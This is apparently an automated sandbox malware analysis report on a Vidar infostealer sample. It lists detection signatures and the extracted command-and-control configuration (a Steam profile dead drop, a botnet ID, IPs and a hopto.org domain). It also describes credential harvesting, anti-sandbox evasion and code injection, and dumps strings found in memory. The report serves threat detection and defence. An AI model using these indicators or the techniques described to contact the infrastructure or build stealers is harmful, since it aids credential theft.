Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
aZm1EZ2IYr.exe

Overview

General Information

Sample name:aZm1EZ2IYr.exe
renamed because original name is a hash value
Original sample name:1e1d5412616216fd90ea3cb6a87353db.exe
Analysis ID:1538067
MD5:1e1d5412616216fd90ea3cb6a87353db
SHA1:da0ae99aebbde6433c8dc985e8c8b2305cdb9b54
SHA256:765eb00651ebf6ddbc9c8d6e687292dae89f0d8260cea08505020992835208d8
Tags:32exetrojanVidar
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Country aware sample found (crashes after keyboard check)
Machine Learning detection for sample
PE file has a writeable .text section
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Classification

Process Tree

  • System is w10x64
  • aZm1EZ2IYr.exe (PID: 7336 cmdline: "C:\Users\user\Desktop\aZm1EZ2IYr.exe" MD5: 1E1D5412616216FD90EA3CB6A87353DB)
    • WerFault.exe (PID: 7828 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 2220 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7892 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 2384 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199786602107"], "Botnet": "df523263f44cc8d55414a260a0197e4a"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
aZm1EZ2IYr.exeJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    aZm1EZ2IYr.exeJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      aZm1EZ2IYr.exeJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            00000000.00000000.1668857258.00000000001B0000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              00000000.00000000.1668857258.00000000001B0000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  Click to see the 3 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.2.aZm1EZ2IYr.exe.180000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    0.2.aZm1EZ2IYr.exe.180000.0.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                      0.0.aZm1EZ2IYr.exe.180000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        0.0.aZm1EZ2IYr.exe.180000.0.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security

                          Sigma Signatures

                          No Sigma rule has matched

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-20T08:35:25.223918+020020287653Unknown Traffic192.168.2.44974065.109.142.154443TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Found malware configuration
                          Source: aZm1EZ2IYr.exeMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199786602107"], "Botnet": "df523263f44cc8d55414a260a0197e4a"}
                          Multi AV Scanner detection for domain / URL
                          Source: cowod.hopto.orgVirustotal: Detection: 12%Perma Link
                          Source: http://cowod.hopto.org/pVirustotal: Detection: 7%Perma Link
                          Multi AV Scanner detection for submitted file
                          Source: aZm1EZ2IYr.exeReversingLabs: Detection: 73%
                          Source: aZm1EZ2IYr.exeVirustotal: Detection: 60%Perma Link
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
                          Machine Learning detection for sample
                          Source: aZm1EZ2IYr.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00188048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00188048
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_001880A1 CryptUnprotectData,LocalAlloc,LocalFree,0_2_001880A1
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00191E32 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00191E32
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0018A7AD _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA,0_2_0018A7AD
                          Source: aZm1EZ2IYr.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49737 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 65.109.142.154:443 -> 192.168.2.4:49740 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49742 version: TLS 1.2
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00196013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00196013
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0018B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0018B914
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00195B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00195B4D
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0019547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_0019547D
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00189CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00189CF1
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00194D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,0_2_00194D08
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0018CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0018CD0C
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0018D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0018D59B
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00181D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00181D80
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0018B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0018B5B4
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_0018BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0018BF22
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00195182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00195182
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]0_2_001814AD
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax0_2_001814AD

                          Networking

                          barindex
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199786602107
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199786602107 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /lpnjoke HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                          Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                          Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                          Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                          Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49740 -> 65.109.142.154:443
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 65.109.142.154Connection: Keep-AliveCache-Control: no-cache
                          Source: unknownTCP traffic detected without corresponding DNS query: 65.109.142.154
                          Source: unknownTCP traffic detected without corresponding DNS query: 65.109.142.154
                          Source: unknownTCP traffic detected without corresponding DNS query: 65.109.142.154
                          Source: unknownTCP traffic detected without corresponding DNS query: 65.109.142.154
                          Source: unknownTCP traffic detected without corresponding DNS query: 65.109.142.154
                          Source: unknownTCP traffic detected without corresponding DNS query: 65.109.142.154
                          Source: unknownTCP traffic detected without corresponding DNS query: 65.109.142.154
                          Source: unknownTCP traffic detected without corresponding DNS query: 65.109.142.154
                          Source: unknownTCP traffic detected without corresponding DNS query: 65.109.142.154
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Users\user\Desktop\aZm1EZ2IYr.exeCode function: 0_2_00186963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00186963
                          Source: global trafficHTTP traffic detected: GET /profiles/76561199786602107 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 65.109.142.154Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /lpnjoke HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                          Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                          Source: global trafficDNS traffic detected: DNS query: t.me
                          Source: global trafficDNS traffic detected: DNS query: cowod.hopto.org
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto.
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto.ered.com/explore/
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto.org
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003B3D000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003B3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/p
                          Source: aZm1EZ2IYr.exeString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto.orgclass=
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto.orgsive/header_logo.png
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hopto.re
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hoptotml
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.hoptowered.com/explore/
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cowod.oudflare
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://ore.steampowered.com/explore/
                          Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                          Source: 76561199786602107[1].htm.0.drString found in binary or memory: https://65.109.142.154
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1948640498.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.142.154/
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.142.154/C
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                          Source: 76561199786602107[1].htm.0.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://community.c
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://community.cloudflare.stea
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/app
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=D_iTAfDsLH
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=4Xou
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
